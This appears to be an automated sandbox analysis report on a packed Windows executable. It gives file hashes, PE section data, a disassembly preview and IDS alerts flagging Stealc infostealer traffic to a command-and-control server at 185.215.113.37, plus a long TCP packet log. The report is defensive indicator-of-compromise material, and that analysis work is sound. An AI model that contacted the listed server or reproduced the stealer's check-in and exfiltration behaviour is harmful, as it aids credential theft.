Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.946055880339516
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'827'328 bytes
MD5:	904925a03f5e62b7b67ee30d22e9c7cf
SHA1:	acec73d1e47b2dddf74addc3529345254135062f
SHA256:	d5f6c82d696b68c10f33762a2fd0628afd233b0d07c99654b186f699446d990b
SHA512:	688660f97c278e2fad8167af3c75ccf41e432d7962f0ea242b01d410026541fb140f723a1a42622515c987b692e207c79eb83493cce7ba73f189cf83e2a4fea3
SSDEEP:	49152:qFCMAksd1M9uacULmOrLwlNwgbHsx3gLE72rlqJr:9Xd1QutGmE+NZHS32rl
TLSH:	9D8533B1B545693BD93CC97F05D3C4AE67121A28DDB1C1905EE3EE884A10B6BDA8CF4C
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L.../..f...........

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0xa96000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F1BA2F [Mon Sep 23 18:57:51 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F02BD263F2Ah
xadd byte ptr [ebx], bl
add byte ptr [eax], al
add byte ptr [eax], al
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x25d050	0x64	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x25d1f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x25b000	0x22800	7729c25f40a29e1910e9f49aa314063f	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x25c000	0x1000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x25d000	0x1000	0x200	c60c4959cc8d384ac402730cc6842bb0	False	0.1328125	data	0.9064079259880791	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x25e000	0x29f000	0x200	041315b4ac74f950d6d0f3e2479f9aed	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
niikbxzg	0x4fd000	0x198000	0x197e00	0fd99580f0ca0637fbeadb2775f2bb35	False	0.9947379951348453	data	7.953629957241494	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
nnynhmhk	0x695000	0x1000	0x600	e812d3a3d3979f97b511f698eb63feb8	False	0.6197916666666666	data	5.315160447605483	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x696000	0x3000	0x2200	b035b64e496e9ef0f4a5d567dd24212e	False	0.00666360294117647	DOS executable (COM)	0.019571456231530684	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-27T04:14:04.392583+0200	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.5	49704	185.215.113.37	80	TCP
2024-09-27T04:14:04.634601+0200	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	192.168.2.5	49704	185.215.113.37	80	TCP
2024-09-27T04:14:04.698840+0200	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	185.215.113.37	80	192.168.2.5	49704	TCP
2024-09-27T04:14:04.919274+0200	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	192.168.2.5	49704	185.215.113.37	80	TCP
2024-09-27T04:14:04.926087+0200	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	185.215.113.37	80	192.168.2.5	49704	TCP
2024-09-27T04:14:06.016545+0200	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	192.168.2.5	49704	185.215.113.37	80	TCP
2024-09-27T04:14:06.496049+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49704	185.215.113.37	80	TCP
2024-09-27T04:14:11.763214+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49704	185.215.113.37	80	TCP
2024-09-27T04:14:12.805120+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49704	185.215.113.37	80	TCP
2024-09-27T04:14:13.526244+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49704	185.215.113.37	80	TCP
2024-09-27T04:14:14.366920+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49704	185.215.113.37	80	TCP
2024-09-27T04:14:16.093665+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49704	185.215.113.37	80	TCP
2024-09-27T04:14:16.509752+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49704	185.215.113.37	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 27, 2024 04:14:03.414015055 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:03.418977976 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:03.419087887 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:03.419228077 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:03.423974991 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:04.138974905 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:04.139173985 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:04.142781973 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:04.147587061 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:04.392410994 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:04.392582893 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:04.409393072 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:04.414424896 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:04.634522915 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:04.634545088 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:04.634601116 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:04.634632111 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:04.694006920 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:04.698839903 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:04.919199944 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:04.919234991 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:04.919245958 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:04.919274092 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:04.919297934 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:04.919308901 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:04.919322014 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:04.919352055 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:04.919373035 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:04.919416904 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:04.919822931 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:04.919833899 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:04.919908047 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:04.919924021 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:04.921308041 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:04.926086903 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:05.145955086 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:05.146045923 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:05.165585041 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:05.165608883 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:05.170365095 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:05.170450926 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:05.170459986 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:05.170469046 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:05.170479059 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:05.170584917 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:05.170594931 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.016439915 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.016545057 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.273667097 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.278469086 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.495910883 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.495937109 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.495945930 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.496010065 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.496021986 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.496032953 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.496043921 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.496048927 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.496090889 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.496090889 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.496789932 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.496831894 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.496833086 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.496844053 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.496876001 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.496901035 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.496917009 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.496927977 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.497011900 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.619878054 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.619914055 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.619926929 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.619956970 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.620022058 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.620044947 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.620085955 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.620098114 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.620115042 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.620141029 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.620141029 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.620423079 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.620469093 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.620611906 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.620623112 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.620675087 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.620675087 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.620690107 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.620702028 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.620739937 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.621021032 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.621063948 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.621076107 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.621103048 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.621103048 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.621140003 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.621149063 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.621161938 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.621201038 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.621201038 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.621874094 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.621918917 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.621937990 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.621951103 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.621979952 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.621992111 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.622025967 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.622037888 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.622061014 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.622078896 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.622742891 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.622792959 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.622803926 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.622818947 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.622832060 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.622859001 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.622863054 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.622869015 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.622901917 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.622931004 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.744124889 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.744139910 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.744220018 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.744273901 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.744323015 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.744335890 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.744340897 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.744374990 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.744393110 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.744421005 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.744432926 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.744457006 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.744493961 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.744534016 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.744590044 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.744612932 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.744625092 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.744658947 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.744687080 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.744687080 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.744709969 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.744879007 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.744924068 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.744925022 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.744936943 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.744960070 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.744973898 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.744997025 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.745012999 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.745249033 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.745305061 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.745316982 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.745330095 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.745347023 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.745356083 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.745384932 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.745397091 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.745438099 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.745438099 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.745745897 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.745784998 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.745791912 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.745796919 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.745827913 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.745841980 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.745918989 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.745934010 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.745944023 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.745955944 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.745961905 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.745995998 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.745995998 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.746104002 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.746117115 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.746186972 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.746186972 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.746690035 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.746733904 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.746745110 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.746752024 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.746786118 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.746786118 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.746861935 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.746876955 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.746887922 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.746897936 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.746916056 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.746916056 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.746932983 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.746999025 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.747010946 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.747040987 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.747068882 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.747632027 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.747692108 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.747703075 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.747713089 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.747786999 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.747786999 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.747791052 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.747802973 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.747834921 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.747879982 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.747905016 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.747915983 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.747926950 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.747940063 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.747967005 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.747977018 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.748570919 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.748610020 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.868768930 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.868793011 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.868803978 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.868844032 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:06.868889093 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.868906021 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.868917942 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.868930101 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:06.869031906 CEST	80	49704	185.215.113.37	192.168.2.5
